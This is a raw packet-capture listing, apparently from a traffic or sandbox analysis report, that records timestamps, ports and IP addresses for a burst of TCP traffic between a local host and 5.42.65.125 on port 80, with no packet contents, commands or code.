Dec 27, 2023 17:57:26.366110086 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.366112947 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.366125107 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.366147995 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.366161108 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.366172075 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.366192102 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.366456032 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.366472960 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.366496086 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.366514921 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.366542101 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.366559982 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.366573095 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.366585016 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.366599083 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.366611004 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.366615057 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.366641045 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.366641045 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.366656065 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.366672039 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.366703033 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.366722107 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.366725922 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.366739988 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.366753101 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.366765976 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.366776943 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.366792917 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.366806030 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.366806984 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.366821051 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.366833925 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.366847992 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.366863012 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.366885900 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.366894007 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.366900921 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.366925955 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.366931915 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.366965055 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.366981030 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.367043018 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.367058992 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.367072105 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.367100000 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.367129087 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.367446899 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.367463112 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.367475033 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.367489100 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.367501020 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.367506027 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.367515087 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.367530107 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.367533922 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.367547035 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.367558002 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.367563009 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.367578983 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.367603064 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.367611885 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.367656946 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.367671013 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.367683887 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.367697954 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.367712975 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.367716074 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.367734909 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.367738962 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.367753983 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.367764950 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.367778063 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.367791891 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.367793083 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.367821932 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.367842913 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.367872953 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.367887974 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.367918968 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.367939949 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.368185997 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.368227959 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.368268967 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.368273973 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.368290901 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.368303061 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.368318081 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.368330002 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.368351936 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.368366957 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.368381977 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.368422985 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.368452072 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.368465900 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.368478060 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.368499041 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.368499994 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.368516922 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.368525982 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.368554115 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.368557930 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.368567944 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.368613958 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.368616104 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.368628979 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.368654013 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.368676901 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.368709087 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.368738890 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.368783951 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.368849039 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.368864059 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.368875980 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.368890047 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.368894100 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.368908882 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.368918896 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.368925095 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.368937969 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.368952036 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.368989944 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.369158030 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.369174004 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.369215012 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.369246960 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.369261026 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.369272947 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.369286060 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.369298935 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.369302034 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.369313002 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.369327068 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.369333982 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.369342089 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.369355917 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.369355917 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.369385958 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.369476080 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.369491100 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.369527102 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.369534969 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.369541883 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.369573116 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.369575977 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.369592905 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.369620085 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.369666100 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.369682074 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.369712114 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.369715929 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.369731903 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.369760036 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.369815111 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.369832039 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.369858980 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.369939089 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.369954109 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.369966984 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.369980097 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.370007992 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.370011091 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.370037079 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.370098114 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.370110989 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.370122910 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.370136023 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.370138884 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.370150089 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.370165110 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.370171070 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.370178938 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.370193005 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.370199919 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.370207071 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.370213032 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.370223999 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.370239973 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.370244026 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.370253086 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.370280981 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.370280981 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.370296001 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.370296001 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.370323896 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.370338917 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.370367050 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.370392084 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.370405912 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.370431900 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.370445013 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.370477915 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.370507956 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.370522022 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.370536089 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.370551109 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.370608091 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.370878935 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.370910883 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.370951891 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.370954990 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.370968103 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.371012926 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.371108055 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.371123075 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.371165991 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.371212959 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.371227980 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.371241093 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.371253967 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.371265888 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.371278048 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.371279001 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.371293068 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.371303082 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.371315002 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.371325016 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.371330976 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.371344090 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.371351957 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.371359110 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.371371984 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.371381044 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.371388912 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.371402979 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.371417046 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.371417999 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.371432066 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.371443033 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.371448040 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.371490955 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.371772051 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.371788025 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.371820927 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.371823072 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.371859074 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.371862888 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.371875048 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.371901035 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.371915102 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.371942997 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.371968985 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.371972084 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.372040033 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.372055054 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.372081041 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.372122049 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.372137070 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.372149944 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.372164011 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.372190952 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.372240067 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.372260094 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.372272015 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.372286081 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.372298956 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.372313023 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.372323036 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.372327089 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.372339964 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.372342110 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.372353077 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.372356892 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.372370958 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.372376919 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.372386932 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.372400045 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.372407913 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.372414112 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.372426987 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.372442961 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.372464895 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.372631073 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.372643948 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.372673988 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.372750998 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.372819901 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.372833967 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.372845888 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.372862101 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.372874022 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.372881889 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.372886896 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.372900963 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.372901917 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.372917891 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.372922897 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.372934103 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.372946978 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.372947931 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.372962952 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.372975111 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.372978926 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.372993946 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.373007059 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.373012066 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.373020887 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.373034954 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.373035908 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.373049021 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.373059988 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.373061895 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.373100996 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.373250961 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.373265028 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.373317003 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.373462915 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.373491049 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.373512030 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.373655081 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.373670101 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.373682022 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.373694897 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.373706102 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.373717070 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.373723030 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.373729944 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.373738050 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.373744965 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.373770952 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.373785973 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.373811960 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.373825073 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.373876095 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.373887062 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.373900890 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.373914003 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.373934984 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.374030113 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.374043941 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.374054909 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.374069929 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.374070883 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.374098063 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.374103069 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.374144077 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.374217987 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.374233007 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.374244928 CET	80	49738	5.42.65.125	192.168.2.4
